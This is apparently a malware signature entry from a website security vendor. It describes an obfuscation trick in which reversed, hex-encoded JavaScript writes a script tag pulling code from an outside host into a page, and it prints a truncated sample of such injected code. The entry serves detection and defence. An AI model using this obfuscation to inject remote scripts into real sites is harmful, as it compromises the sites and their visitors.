Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.hex_reverse_script

Description: Suspicious code that uses the .split("").reverse().join("") trick to obfuscate injection of scripts into a web page.

Many malicious scripts add one more layer of obfuscation by applying common JavaScript Obfuscator where reversed script gets hex-encoded. For example:

var _0xaae8=["","\x6A\x6F​\x69\x6E","\x72\x65\x76​\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69​\x72\x63\x73\x2F\x3C\x3E​\x22\x73\x6A\x2E\x79​\x72\x65\x75\x71\x6A\x2F​\x38...skipped...\x31\x2E\x39\x34\x32​\x2E\x34\x33\x31\x2F\x2F\x3A​\x70\x74\x74\x68\x22\x3D\x63\x72​\x73\x20\x74\x70\x69​\x72\x63\x73\x3C","\x77\x72​\x69\x74\x65"];document​[_​0xaae8[5]](_0xaae8[4][_​0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8​[0])​)
where "\x3D\x63\x72​\x73\x20\x74\x70\x69\x72​\x63\x73\x3C" decodes to "=crs tpircs<" and then to "<script src=".



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb